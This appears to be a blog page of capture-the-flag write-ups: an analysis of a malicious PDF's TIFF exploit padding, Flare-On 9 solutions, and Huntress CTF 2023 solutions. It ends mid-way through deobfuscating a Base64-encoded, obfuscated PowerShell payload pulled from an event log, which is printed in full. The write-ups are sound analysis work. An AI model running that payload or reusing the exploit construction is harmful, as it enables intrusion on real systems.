These bytes are the file header of a TIFF graphic image. Oh, and that 10,984-character run of "QUFB"? Each "QUFB" Base64-decodes to 0x414141 ("AAA"). That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.
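The header and padding are easy to reproduce outside the PDF. This sketch rebuilds only the first two pieces (_j8 and _j9) and leaves out _ll0 and _j5; repeat_to_length() is my own Python rendering of the JavaScript _I2() helper.

```python
import base64

def repeat_to_length(text, length):
    # Mirrors the JavaScript _I2(): double the string until long enough, then truncate
    while len(text) < length:
        text += text
    return text[:length]

j8 = "SUkqADggAABB"
j9 = repeat_to_length("QUFB", 10984)

# j8 + j9 is a multiple of four characters, so it decodes cleanly on its own
decoded = base64.b64decode(j8 + j9)

print(decoded[:9].hex(" "))       # header bytes from _j8
print(set(decoded[9:]))           # everything after the header
```

The first four bytes are the little-endian TIFF signature, and everything after the nine header bytes is a solid run of 0x41.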

Flare-On 9 - The Worst Writeups


Since its inaugural year I have been a participant in the FireEye / Mandiant Flare-On challenges produced by FLARE, the FireEye Labs Advanced Reverse Engineering team. FLARE is one of the industry's most accomplished teams of reverse engineers, and they have created an annual CTF that focuses on reverse engineering challenges, many of which are rooted in real-life attacks and incident responses.

I have blogged about FLARE challenges in the past and many readers have noticed that my write-ups tend to steer towards the unexpected solutions: the fun, unconventional, and sometimes offensive (to the reader) solutions. After all, this is a time to have fun and play with challenges that I do not see on a regular basis. Much of this originates from my prior experience in a reverse engineering team that focused on intrusions from nation state attacks. Our metrics were on how quickly we could provide answers, not how in-depth or concise we could be. So my immediate goal is speed: identifying shortcuts and exploiting every advantage I can find. And then putting the proper methodology into tech debt.

And so, with the completion of Flare-On 9 (2022 edition) I have highlighted my own horrible solutions to a few of the challenges. 


Challenge 2 - Pixel Poker

This challenge opens as a simple Windows GUI-based application that displays a large matrix of seemingly random colors. This seems like the start of a steganography-based challenge, like what they provided in 2015's challenges.

In a quick review in IDA Pro, one of the first things I look for is the success criteria and the failure criteria. If you click more than 10 times, that is, make 10 attempts to find the pixel, it will display a failure message and quit. The first effort, then, is modifying the execution to remove that check. After comparing the number of attempts to 10, the code takes a JNZ to the correct path. Instead of the conditional check, I just made this an absolute JMP.

There is also an obvious RC4 decryption routine mixed in that appeared to be taking the window title, with the attempted x/y coords, as the key. However, during analysis, this appeared to be a decryption for that particular pixel and not of the entire image.


With the error check removed, I started the quick effort of just blindly clicking to see what would happen. Then, I tried automated clicking. I had just written functionality into Noriben to emulate human behavior by moving the mouse and clicking it. Since I had that code on hand I used it here.

When clicking down a column I realized something. All of the pixels were being reverted back to an original state and, when complete, were actually piecing together an image. This was in line with my thoughts on the RC4 decryption. So, instead of reverse engineering the program to determine the actual pixel, I just wrote a program to brute force every pixel.

import pyautogui

pyautogui.PAUSE = 0
pyautogui.FAILSAFE = True

x_offset = 10
y_offset = 475
start_x = 5 + x_offset
start_y = 60 + y_offset
max_x = start_x + 730 - x_offset
max_y = start_y + 600 - y_offset

for x in range(start_x, max_x):
    for y in range(start_y, max_y):
        # print(x, y)
        # pyautogui.moveTo(x, y)
        pyautogui.click(x=x, y=y, clicks=1, button='left')

Within a few minutes I realized that there was text being written at the bottom of the image. So, as shown in the code, I measured the pixel locations and focused my clicking via x and y offsets. I let it run for a few minutes, and the flag was found. Boom!




Challenge 10 - Nur geträumt

Now this is an interesting one. The description was a bit verbose and gave you a lot of detail to prepare for the challenge. As it was a macOS 7 disk image and application, you would need an emulator for it. Mini vMac, Basilisk, etc. IMO, there was too much help in the description, but installing a proper environment does have challenges. I obtained Mini vMac, the macOS 7 install disks from a suspicious and unauthorized source, and a series of blank disk images to install to. 



While that was installing I looked at the provided image. Using binwalk, strings, and a variety of tools showed just basic results. Namely a series of strings that included:

You found the flag!$Remove the umlaut before submi t
99 Luftballons
CRC16 for valid flag
> Flag string (try viewing in hex)
And an interesting short story.


Upon installing the application a quick execution shows a simple input box that displays random binary data when given a value. Using the provided SuperResEdit, there were suspicious items shown. A flag binary resource was found labeled 99 Luftballons.


Interesting. A 48-byte set of characters that is seemingly the final flag in encoded form. Putting that to the side I used the disassembly mode to review the application code. The initial challenge here is that it is written in 68k code, which I am completely unfamiliar with. I perused a number of articles, including MarkeyJester's Tutorial, to find the differences. No stack pushes, instead values are loaded into data registers (D0-Dx) and Address registers (A0-Ax). And can be done en masse before calling a function to load the necessary values.

I then found an online macOS software cracking guide from the 90s that helped immensely. And provided brief bits of levity.



With that at hand, I began looking at the decoding routine.



Since there was no easy means of copying information out of the emulator, I took screenshots of the disassembled code, ran them through an online OCR, and pasted the results into my notes to mark up. Using the assembly tutorials, I started work to arrange this into code. There is an obvious XOR (called EOR) operation.

Overall... there was nothing much here that stood out. From the data given, one was to input a flag value. That flag value would be XOR'd with the "flag" resource, and the result would be CRC16'd to produce a value of 0x2718. The 0x2718 and the size of the key data are stored within the resource, with the rest being just an XOR key.

But, at this stage, I could not find a proper key or flag to check the XOR against ... and I did not want to brute force that many bytes through CRC16.

At this point I needed a mental break. Challenges 8 and 9 had done me in. I was just drained and couldn't focus.

So, I went back into the app and just started typing. There was a big clue of 80s music, so I typed in random song titles. What got me thinking was when I typed in a title starting with "Just". The result below showed "Funn". So I tried typing in "Funn" and got "Just". Mind blown: this is just a simple XOR routine.

Knowing that, I went straight to crib dragging. I knew the flag ended with @flare-on.com, so it was a matter of finding where it exists in the result to find the appropriate key.

@flare-on.com
a@flare-on.com
aa@flare-on.com

And that was it. A set of obvious data appeared at the end of the results. "du etwas Zei". But since the @flare-on.com cannot possibly be at that location, I continued to drag it. After 32 "a"'s, it showed again. So now I know the potential length of my flag, before the domain part, is 32 bytes.
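I did the dragging by hand inside the emulator, but the same idea is only a few lines of Python. This is a sketch with made-up stand-in values (demo_key and demo_flag are hypothetical, not the challenge data): slide the known suffix across the encoded bytes and keep any offset where the XOR result is readable text.

```python
def xor_bytes(data, key):
    # XOR two byte strings, truncating to the shorter one
    return bytes(a ^ b for a, b in zip(data, key))

def crib_drag(encoded, crib):
    # Slide the crib across the encoded bytes; each readable result is a candidate key fragment
    results = []
    for offset in range(len(encoded) - len(crib) + 1):
        fragment = xor_bytes(encoded[offset:offset + len(crib)], crib)
        if all(0x20 <= b <= 0x7e for b in fragment):
            results.append((offset, fragment.decode("ascii")))
    return results

# Hypothetical stand-ins: neither value comes from the challenge
demo_key = b"some readable lyric text here"
demo_flag = b"not_the_real_one@flare-on.com"
encoded = xor_bytes(demo_flag, demo_key)

hits = crib_drag(encoded, b"@flare-on.com")
for offset, fragment in hits:
    print(offset, repr(fragment))
```

The printable-only filter is crude and will occasionally let noise through, so the results still need a human to spot which fragment looks like language.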



A quick web search for "du etwas Zei" showed it as part of the lyrics to 99 Luftballons. It couldn't be that simple, could it? Knowing "@flare-on.com" would be in the lyrics, I typed enough out with that appended and eventually got somewhat of a flag. The results were the second line of the lyrics with underscores as spaces. 


I quickly typed in the rest of the first line and ... got most of the flag, which then turned corrupted. "@flare-on.com" was missing. I was missing a byte. I put in a random byte and got the correct value. OK, so there was something missing. Knowing it's XOR, and assuming an underscore, I typed an underscore and got a question mark. Putting the question mark back into the answer gave me the underscore in the flag. But I still had a corrupt "Lied". Seeing the umlaut in the lyrics, I entered it into the key and got the correct flag, which the instructions said to omit upon submitting.




Challenge 11 - The challenge that shall not be named.

The ultimate challenge, and it is a hard one... If you complete it as planned. It's an executable with tell-tale signs of being a Python executable such as "PYZ" and "_MEIPASS". But, first, let's just run it.

I launched it and tracked results with Noriben ... nothing happened. Tried a few more times. Nothing. OK, maybe some anti-debugging in place.

I executed 11.exe via API Monitor to see what was killing it. Upon it terminating, I located the ExitProcess() and then worked backward to find whatever function was making it go there. Now, here's where I'm questioning myself, because the sample had two distinct failures that I don't see in the official write-ups. It attempted to load mscoree.dll and would fail if not found. 


I also saw a strcmp() between the filename (11.exe) and wwahost.exe. I may have misread this check during the challenge to think it was being used. I don't think it actually was part of the challenge, as it took place in kernel32 but, regardless, I was in a hurry and renamed 11.exe to wwahost.exe and executed from there.  (Did not take screenshot of this, just copied text to my notes)

#   Time of Day Thread  Module  API Return Value    Error   Duration
34836   1:29:34.235 PM  1   KERNEL32.DLL    wcsncpy_s ( 0x0000029293edff48, 260, "C:\Users\Admin\Desktop\11\11.exe", -1 )   0       0.0000055
34837   1:29:34.235 PM  1   KERNEL32.DLL    wcsrchr ( "C:\Users\Admin\Desktop\11\11.exe", '\' ) 0x000000b7275e8862      0.0000055
34838   1:29:34.235 PM  1   KERNEL32.DLL    _wcsicmp ( "11.exe", "wwahost.exe" )    -70     0.0000051


From there it executed, and I reviewed the results more intently. There were numerous calls by pytransform.pyd to copy small pieces of data, presumably from the executable, to memory.


There was also a distinct section of string comparisons where it was made obvious that this was using PyArmor for protection.


At this point it made a connection to www.evil.flare-on.com:




I suspended the process here and poked at the memory in Process Hacker 2 to see what else was in the packet, or staged for the packet. And I was left dumbfounded when the flag was literally in the first result ...


This does make sense to a point. Data encrypted at rest must become decrypted eventually in memory. I just didn't expect it to be all in one place and packaged so neatly for me. But, hey, I'll take it.
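I did this by eye in Process Hacker, but if you had saved the process memory to a file, the same search could be scripted. A rough sketch, assuming the flag keeps the usual "@flare-on.com" suffix and may be stored as either ASCII or UTF-16LE; the demo blob below is synthetic, not data from the challenge.

```python
import re

SUFFIX = "@flare-on.com"

# Printable characters followed by the suffix, as plain ASCII
ASCII_RE = re.compile(rb"[\x21-\x7e]{1,64}" + re.escape(SUFFIX.encode("ascii")))
# The same thing as UTF-16LE, where each character is followed by a null byte
WIDE_RE = re.compile(rb"(?:[\x21-\x7e]\x00){1,64}" + re.escape(SUFFIX.encode("utf-16-le")))

def find_flags(blob):
    hits = {m.group().decode("ascii") for m in ASCII_RE.finditer(blob)}
    hits |= {m.group().decode("utf-16-le") for m in WIDE_RE.finditer(blob)}
    return sorted(hits)

# Synthetic stand-in for a memory dump
demo_blob = (b"\x00\x01junk\x00demo_flag@flare-on.com\xff"
             + "wide_flag@flare-on.com".encode("utf-16-le") + b"\x00\x00")

found = find_flags(demo_blob)
print(found)
```

For a real dump you would read the file in binary mode and pass its contents to find_flags().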

I discussed this challenge with other winners. Their "short cut" was the simple method laid out in the write-up: to just hijack the local calls from within the PyInstaller extracted folder. Now I really felt like I cheated here 😂

In the interim, I have started working on a proper solution by recompiling CPython and dumping byte code at PyEval_EvalFrameDefault(), using existing examples.

I have named it Python Ginger, or PythonG.



I now have a valid excuse for why I am constantly typing "pythong" in my terminal.

Huntress CTF 2023 - Unique Approaches to Fun Challenges


As someone who has participated in numerous Capture The Flag (CTF) competitions, I was excited when Huntress Labs announced their CTF late last year. Anytime a new organization ventures into hosting CTFs, it brings fresh perspectives, twists, and innovative approaches to data manipulation to obtain flags.

I found their daily-released challenges to be particularly engaging. To rank high, participants had to swiftly complete all challenges. While other CTFs focus on different aspects, like Flare-On which emphasizes malware reverse engineering, the Huntress Labs CTF encompassed a wide range of Digital Forensics and Incident Response (DFIR) tasks. This included dealing with malware, forensic analysis, log examination, OSINT (Open Source Intelligence), recent emerging threats, and manipulation of live systems.

Many challenges involved datasets that are seldom addressed in other competitions. There were fewer challenges centered around random cryptography, key generation, or website attacks, and more focused on parsing large, unknown data structures and analyzing the results.

Flare-On was occurring during this same time period. However, for reasons I won't go into here, I spent most of 2023 with significant cognitive impairment from a traumatic brain injury. While Flare-On is my go-to event, by the time I got to its third challenge I realized that I would not be able to focus enough to complete it. The Huntress Labs CTF of daily, short challenges was more my speed at the time. Challenges could be completed in under an hour and scratched many of the mental itches.

This isn't a comprehensive analysis of all the 30+ challenges, but I wanted to highlight some interesting and unique solutions. My background as a forensic investigator, malware analyst, reverse engineer, incident responder, threat analyst, and mentor to others provided me with various perspectives while tackling these challenges.

BlackCat


BlackCat came late in the competition and was actually right up my alley. The challenge provided you with a ransomware decryption tool with a set of encrypted files.

-rw-r--r--  1 rurik  staff 2814464 Sep 26 08:10 DecryptMyFiles.exe
-rw-r--r--  1 rurik  staff 1190420 Sep 26 08:10 NOTE.png
drwx------  7 rurik  staff     224 Sep 26 08:10 victim-files

./victim-files:
-rw-r--r--  1 rurik  staff  109857 Sep 26 08:10 Bliss_Windows_XP.png.encry
-rw-r--r--  1 rurik  staff    8457 Sep 26 08:10 Huntress-Labs-Logo-and-Text-Black.png.encry
-rw-r--r--  1 rurik  staff      74 Sep 26 08:10 flag.txt.encry
-rw-r--r--  1 rurik  staff   13959 Sep 26 08:10 my-favorite-rock.jpg.encry
-rw-r--r--  1 rurik  staff  191725 Sep 26 08:10 the-entire-text-of-hamlet.txt.encry

Simple execution showed that the file required a pass key to perform decryption. 



From there, it's a matter of finding the decryption routine. There are various ways of doing this. To make it easier, I've written my own IDAPython script for IDA Pro that simplifies the process. This is particularly effective in unstripped binaries that contain descriptive function names. This code is found below:

import idautils
import ida_funcs
import idc


def op_to_hex(op):
    # Convert IDA-style hex immediates such as "32h" into "0x32"; leave registers alone
    try:
        op_value = int(op, 16) if op.isdigit() else int(op[:-1], 16)
        return '0x{0:02X}'.format(op_value)
    except ValueError:
        return op


def find_xor_shift_operations():
    for function_ea in idautils.Functions():
        func_name = ida_funcs.get_func_name(function_ea)
        func_name = func_name.ljust(50)
        for head in idautils.Heads(function_ea, idc.get_func_attr(function_ea, idc.FUNCATTR_END)):
            mnemonic = idc.print_insn_mnem(head)
            if mnemonic in ["xor", "shl", "shr"]:
                op1 = idc.print_operand(head, 0)
                op2 = idc.print_operand(head, 1)
                # Skip self-XORs such as "xor eax, eax", which only zero a register
                if op1 != op2:
                    op2 = op_to_hex(op2)
                    instructions = '{}  {}, {}'.format(mnemonic, op1, op2)
                    line = '%s\t%s' % (func_name, instructions)
                    print(line)


# Run the scan when the script is loaded in IDA
find_xor_shift_operations()

In short, it iterates through every operation and looks for XOR and shift operations. The operands are compared to each other. In any instance where the first operand is operated on by a different address, the results are shown. For static values where IDA would typically show as 32h, it would convert to 0x32. Running this script produces a few hundred results, but a very quick review shows the obviously relevant lines:


Copy the code, then double-click main.main to go to that routine. Alt-T for a text search for "xor  r8d, r10d" will find the instruction block:


The use of a simple movzx before an XOR suggests that this block is called iteratively over a string to XOR each byte. Nothing more. We could trace r8 register back to show that it originates from operations over the provided pass key with its own:

movzx   r8d, byte ptr [rdx+rbx]

So, a very simple multi-byte XOR between two strings, where the expected passkey is 8 bytes (other code not shown here).

As we see one file is an encrypted PNG file, we can do simple crib-dragging. That is, XOR the encrypted data by the expected known-good data, which should result in the key. By copying the known-good file header we can use Python malduck to make this simple:

>>> import malduck
>>> key = open('NOTE.png', 'rb').read()
>>> data = open('victim-files/Bliss_Windows_XP.png.encry', 'rb').read()
>>> dec = malduck.xor(key, data)
>>> dec[0:10]
b'cosmoboico'

Comparing the known-good header from NOTE.png to the encrypted value produces the key "cosmoboi".
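If malduck isn't installed, the same recovery works with nothing but the standard library, since every PNG starts with the same fixed 8-byte signature and the key is 8 bytes long. The sketch below fakes an encrypted file so it can run on its own; fake_png and the helper names are my inventions.

```python
from itertools import cycle

# The fixed 8-byte signature at the start of every PNG file
PNG_SIGNATURE = bytes.fromhex("89504e470d0a1a0a")

def xor_repeat(data, key):
    # Multi-byte XOR with the key repeated across the data
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def recover_key(encrypted, known_plaintext, key_len):
    # Known plaintext XOR ciphertext gives back the key bytes
    return bytes(c ^ p for c, p in zip(encrypted[:key_len], known_plaintext[:key_len]))

# Synthetic stand-in for one of the .encry files
fake_png = PNG_SIGNATURE + b"\x00\x00\x00\rIHDR"
encrypted = xor_repeat(fake_png, b"cosmoboi")

recovered = recover_key(encrypted, PNG_SIGNATURE, 8)
print(recovered)
```

With the real files, `encrypted` would simply be the bytes read from one of the encrypted PNGs.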

We can apply this key back to the encrypted flag file to get the flag:

>>> data2 = open('victim-files/flag.txt.encry', 'rb').read()
>>> malduck.xor(b'cosmoboi', data2)
b"Keeping my flag here so it's safe!\n\nflag{092744b55420033c5eb9d609eac5e823}"


Texas Chainsaw Massacre: Tokyo Drift

With a simple challenge out of the way, let's dig into the fun ones.

This challenge contained a single "Application Logs.evtx" Windows event file:

17:46:14-rurik@~/CTF/Huntress_2023/done/blog$ file Application\ Logs.evtx

Application Logs.evtx: MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 268


This data can be easily parsed with evtx_dump from Willi Ballenthin's python-evtx library. There is a LOT of data here to sift through. A total of 323 events that can be dumped to raw XML (ugh). For example:

<?xml version="1.1" encoding="utf-8" standalone="yes"?><Events><Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-CAPI2" Guid="{5bbca4a8-b209-48dc-a8c7-b23d3e5216fb}" EventSourceName="Microsoft-Windows-CAPI2"></Provider><EventID Qualifiers="0">4097</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated SystemTime="2023-10-10 15:54:18.664185"></TimeCreated><EventRecordID>1720</EventRecordID><Correlation ActivityID="" RelatedActivityID=""></Correlation><Execution ProcessID="1132" ThreadID="1884"></Execution><Channel>Application</Channel><Computer>DESKTOP-JU2PNRI</Computer><Security UserID=""></Security></System><EventData><Data>&lt;string&gt;CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE&lt;/string&gt;&lt;string&gt;B1BC968BD4F49D622AA89A81F2150152A41D829C&lt;/string&gt;</Data><Binary></Binary></EventData></Event>


There was no obvious way I found to go straight at it, so I started poking for obvious signs. One came out when I searched for terms related to the challenge name:

17:54:07-rurik@~/CTF/Huntress_2023/done/blog$ python /Users/rurik/Development/python-evtx/scripts/evtx_dump.py  ./Application\ Logs.evtx | grep -i chain

<EventData><Data>&lt;string&gt;Windows Installer installed the product. Product Name: The Texas Chain Saw Massacre (1974). Product Version: 8.0.382.5. Product Language: English. Director: Tobe Hooper. Installation success or error status: 0.&lt;/string&gt;


Looking around that event shows a nice blob of apparently Base64 data:

17:56:06-rurik@~/CTF/Huntress_2023/done/blog$ python /Users/rurik//Development/python-evtx/scripts/evtx_dump.py  ./Application\ Logs.evtx | grep -C5 -i chain

<Execution ProcessID="9488" ThreadID="0"></Execution><Channel>Application</Channel><Computer>DESKTOP-JU2PNRI</Computer><Security UserID=""></Security></System><EventData><Data>&lt;string&gt;Windows Installer installed the product. Product Name: The Texas Chain Saw Massacre (1974). Product Version: 8.0.382.5. Product Language: English. Director: Tobe Hooper. Installation success or error status: 0.&lt;/string&gt;</Data><Binary>KCgnLiAoIFpUNkVOdjpDb01TcEVjWzQsMjQsJysnMjVdLWpvaW5oeDZoeDYpKCBhNlQgWlQ2KCBTZXQtdmFyaWFCbGUgaHg2T2ZTaHg2IGh4Nmh4NilhNlQrICggW1N0cmlOZycrJ10gW3JFR2VYXTo6bUF0Y2hlUyggYTZUICkpNDIxXVJBaENbLGh4NmZLSWh4NmVDQUxQZVItICA5M11SQWhDWywpODldUkFoQ1srODRdUkFoQ1srOThdUkFoQ1soIEVjYWxQZVJDLSAgNjNdUkFoQ1ssaHg2a3dsaHg2RWNhbFBlUkMtICApaHg2KWJoeDYraHg2MFliMFloeDYraHg2bmlPai1dNTIsaHg2K2h4NjQyLGh4NisnKydoeDY0W2NlaHg2K2h4NnBoeDYraHg2U01vQzpWbmh4NitoeDZla3dsICggaHg2K2h4Ni4gZktJICkgKERuRU9UREFoeDYraHg2ZWh4NitoeDZyLil9ICkgaHg2KycrJ2h4NmlpY3NBOmh4NitoeDY6XUduaWRPY05oeDYraHg2ZS5oeDYraHg2VGh4NitoeDZ4ZXRoeDYraHg2Lmh4NitoeDZNRVRzeXNbaHg2K2h4NiAsX2t3aHg2K2gnKyd4NmwgKFJFRGh4NitoeDZBZVJtYWVydFMubycrJ0loeDYraHg2IHRoeDYraHg2Q2h4NicrJytoeDZlamJPLVdoJysneDYraHg2RW4geyBIQ2FFUm9GaHg2K2h4NmZLSSkgc1NFUnBNJysnb0NlaHg2K2h4JysnNmRoeDYraHg2OjpoeDYraHg2XScrJ2VkT01oeDYraHg2Jysnbk9pc1NFclBNb2NoeDYraHg2Lk5vSVNTZXJoeDYraHg2cE1PYy5vaVssICkgYicrJzBZaHg2K2h4Nj09d0R5RDRwK1MnKydzL2wvaHg2K2h4NmkrNUd0YXRKS3lmTmpPaHg2KycrJ2h4NjNoeDYraHg2M2h4NitoeDY0Vmh4NitoeDZ2ajZ3UnlSWGUxeHkxcEIwaHg2K2h4NkFYVkxNZ093WWh4NitoeDYvL2h4NitoeDZXb21oeDYraHg2eicrJ3pVaHg2K2h4NnRCaHg2K2h4NnN4L2llMHJWWjdoeDYraHg2eGNMaW93V01HRVZqazdKTWZ4Vm11c3poeDYraHg2T1QzWGtLdTlUdk9zcmh4NitoeDZiYmh4NitoeDZjYmh4NitoeDZHeVo2Yy9nWWh4NitoeDZOcGlsaHg2K2h4NkJLN3g1aHg2K2h4NlBsY2h4NitoeDY4cVV5T2hCWWh4NitoeDZWZWNqTkxXNDJZak04U3d0QWh4NitoeDZhUjhJaHg2K2h4Nk9oeDYraHg2d2h4NitoeDZtaHg2K2h4NjZoeDYraHg2VXdXTm1XekN3JysnaHg2K2h4NlZyU2h4NitoeDZyN0loeDYraHg2VDJoeDYraHg2azZNajFNdWh4NitoeDZLaHg2K2h4NlQnKycvb1JoeDYraHg2TzVCS0s4UjNOaERoeDYraHg2b20yQWh4NitoeDZHWXBoeDYraH
g2eWFoeDYraHg2VGFOZzhEQW5lTm9lU2poeDYraCcrJ3g2dWdrVEJGVGNDUGFTSDBRanBGeXdoeDYrJysnaHg2YVF5aHgnKyc2K2h4Nkh0UFVHJysnaHgnKyc2K2h4NkRMMEJLM2h4NitoJysneDZsQ2xySEF2aHg2K2gnKyd4NjRHT3BWS2h4NitoeDZVTmh4NitoeDZtR3pJRGVyYUV2bHBjJysna0M5RUdoeDYraHg2Z0lhZjk2alNtU2h4NicrJytoeDZNaGh4NitoeDZoaHg2K2h4NlJmSTcyaHg2K2h4Nm9IelVrRHNab1Q1aHg2K2h4Nm5oeDYraHg2YzdNRDhXMzFYcScrJ0toeDYraHg2ZDRkYnRoeDYraHg2YnRoMVJkU2lnRWFFaHg2K2h4NkpORVJNTFV4VicrJ2h4NitoeDZNRTRQSnRVaHg2K2h4NnRTSUpVWmZaaHg2K2h4NkVFaHg2K2h4NkFoeDYraHg2SnNUZERaTmJoeDYraHg2MFkoZ25pUlRTNGh4NitoeDY2ZXNoJysneDYraHg2YUJtb1JGOjpddFJldm5PaHg2K2h4NkNbXU1BZXJ0c1lyT21lTS5PaS5tRVRTWXNbIChNYUVyaHg2K2h4NnRoeDYraHg2c0V0QUxmZUQuTk9oeDYraHg2SXNTJysnZXJQbW8nKydjLk9JLm1laHg2K2h4NlRzWVNoeDYnKycraHg2IGh4NitoeDYgdENlamJPLVdFaHg2K2h4Nm4gKCBoeDYoKChubycrJ0lzc2VScFgnKydlLWVrb3ZuaSBhNlQsaHg2Lmh4NixoeDZSaWdodFRvTEVGdGh4NiApIFJZY2ZvckVhY2h7WlQ2XyB9KSthNlQgWlQ2KCBzViBoeDZvRnNoeDYgaHg2IGh4NilhNlQgKSAnKSAgLWNSRXBMQUNFIChbY0hBcl05MCtbY0hBcl04NCtbY0hBcl01NCksW2NIQXJdMzYgLXJFUGxBY2UnYTZUJyxbY0hBcl0zNCAgLXJFUGxBY2UgICdSWWMnLFtjSEFyXTEyNCAtY1JFcExBQ0UgIChbY0hBcl0xMDQrW2NIQXJdMTIwK1tjSEFyXTU0KSxbY0hBcl0zOSkgfC4gKCAkdkVSYm9TRXByZUZlUmVuQ2UudE9TdHJJTkcoKVsxLDNdKyd4Jy1KT2luJycp</Binary></EventData></Event>
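Rather than copying a blob like that out of the terminal by hand, the Binary fields can be pulled out of the dumped text and decoded in one go. A minimal sketch, assuming the evtx_dump output has been saved as text; it uses a plain regex instead of an XML parser, and the demo input below is synthetic.

```python
import base64
import re

# Non-empty <Binary> elements holding Base64 text (possibly wrapped across lines)
BINARY_RE = re.compile(r"<Binary>([A-Za-z0-9+/=\s]+)</Binary>")

def decode_binary_fields(dump_text):
    payloads = []
    for match in BINARY_RE.finditer(dump_text):
        # Drop whitespace that line wrapping may have introduced
        b64_text = "".join(match.group(1).split())
        payloads.append(base64.b64decode(b64_text))
    return payloads

# Synthetic stand-in for a slice of the dumped XML
demo_b64 = base64.b64encode(b"Write-Host 'demo'").decode("ascii")
demo_dump = ("<EventData><Data>demo</Data><Binary>" + demo_b64 +
             "</Binary></EventData>\n<Binary></Binary>")

payloads = decode_binary_fields(demo_dump)
print(payloads)
```

Empty Binary elements, which most of the events in this log have, are skipped by the pattern.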


Decoding this Base64 created a blob of obvious PowerShell script:

(('. ( ZT6ENv:CoMSpEc[4,24,'+'25]-joinhx6hx6)( a6T ZT6( Set-variaBle hx6OfShx6 hx6hx6)a6T+ ( [StriNg'+'] [rEGeX]::mAtcheS( a6T ))421]RAhC[,hx6fKIhx6eCALPeR-  93]RAhC[,)89]RAhC[+84]RAhC[+98]RAhC[( EcalPeRC-  63]RAhC[,hx6kwlhx6EcalPeRC-  )hx6)bhx6+hx60Yb0Yhx6+hx6niOj-]52,hx6+hx642,hx6+'+'hx64[cehx6+hx6phx6+hx6SMoC:Vnhx6+hx6ekwl ( hx6+hx6. fKI ) (DnEOTDAhx6+hx6ehx6+hx6r.)} ) hx6+'+'hx6iicsA:hx6+hx6:]GnidOcNhx6+hx6e.hx6+hx6Thx6+hx6xethx6+hx6.hx6+hx6METsys[hx6+hx6 ,_kwhx6+h'+'x6l (REDhx6+hx6AeRmaertS.o'+'Ihx6+hx6 thx6+hx6Chx6'+'+hx6ejbO-Wh'+'x6+hx6En { HCaERoFhx6+hx6fKI)sSERpM'+'oCehx6+hx'+'6dhx6+hx6::hx6+hx6]'+'edOMhx6+hx6'+'nOisSErPMochx6+hx6.NoISSerhx6+hx6pMOc.oi[, ) b'+'0Yhx6+hx6==wDyD4p+S'+'s/l/hx6+hx6i+5GtatJKyfNjOhx6+'+'hx63hx6+hx63hx6+hx64Vhx6+hx6vj6wRyRXe1xy1pB0hx6+hx6AXVLMgOwYhx6+hx6//hx6+hx6Womhx6+hx6z'+'zUhx6+hx6tBhx6+hx6sx/ie0rVZ7hx6+hx6xcLiowWMGEVjk7JMfxVmuszhx6+hx6OT3XkKu9TvOsrhx6+hx6bbhx6+hx6cbhx6+hx6GyZ6c/gYhx6+hx6Npilhx6+hx6BK7x5hx6+hx6Plchx6+hx68qUyOhBYhx6+hx6VecjNLW42YjM8SwtAhx6+hx6aR8Ihx6+hx6Ohx6+hx6whx6+hx6mhx6+hx66hx6+hx6UwWNmWzCw'+'hx6+hx6VrShx6+hx6r7Ihx6+hx6T2hx6+hx6k6Mj1Muhx6+hx6Khx6+hx6T'+'/oRhx6+hx6O5BKK8R3NhDhx6+hx6om2Ahx6+hx6GYphx6+hx6yahx6+hx6TaNg8DAneNoeSjhx6+h'+'x6ugkTBFTcCPaSH0QjpFywhx6+'+'hx6aQyhx'+'6+hx6HtPUG'+'hx'+'6+hx6DL0BK3hx6+h'+'x6lClrHAvhx6+h'+'x64GOpVKhx6+hx6UNhx6+hx6mGzIDeraEvlpc'+'kC9EGhx6+hx6gIaf96jSmShx6'+'+hx6Mhhx6+hx6hhx6+hx6RfI72hx6+hx6oHzUkDsZoT5hx6+hx6nhx6+hx6c7MD8W31Xq'+'Khx6+hx6d4dbthx6+hx6bth1RdSigEaEhx6+hx6JNERMLUxV'+'hx6+hx6ME4PJtUhx6+hx6tSIJUZfZhx6+hx6EEhx6+hx6Ahx6+hx6JsTdDZNbhx6+hx60Y(gniRTS4hx6+hx66esh'+'x6+hx6aBmoRF::]tRevnOhx6+hx6C[]MAertsYrOmeM.Oi.mETSYs[ (MaErhx6+hx6thx6+hx6sEtALfeD.NOhx6+hx6IsS'+'erPmo'+'c.OI.mehx6+hx6TsYShx6'+'+hx6 hx6+hx6 tCejbO-WEhx6+hx6n ( hx6(((no'+'IsseRpX'+'e-ekovni a6T,hx6.hx6,hx6RightToLEFthx6 ) RYcforEach{ZT6_ })+a6T ZT6( sV hx6oFshx6 hx6 hx6)a6T ) 
')-cREpLACE([cHAr]90+[cHAr]84+[cHAr]54),[cHAr]36-rEPlAce'a6T',[cHAr]34-rEPlAce'RYc',[cHAr]124-cREpLACE([cHAr]104+[cHAr]120+[cHAr]54),[cHAr]39)|.($vERboSEpreFeRenCe.tOStrING()[1,3]+'x'-JOin'')

There's a lot of junk in there, which is standard for obfuscated PowerShell. There are many automated ways of deobfuscating this, but I'm a sucker for manual deobfuscation...

So, first we look for string replacement routines. These are seen at the bottom:

-cREpLACE([cHAr]90+[cHAr]84+[cHAr]54),[cHAr]36-rEPlAce'a6T',[cHAr]34-rEPlAce'RYc',[cHAr]124-cREpLACE([cHAr]104+[cHAr]120+[cHAr]54),[cHAr]39)

As usual with obfuscated PowerShell, remove all the literal ('+') symbols, which exist only to break up continuous strings, and then perform the above replacements. The resulting output has another layer of ('+') characters to remove. Once completed, it produces:

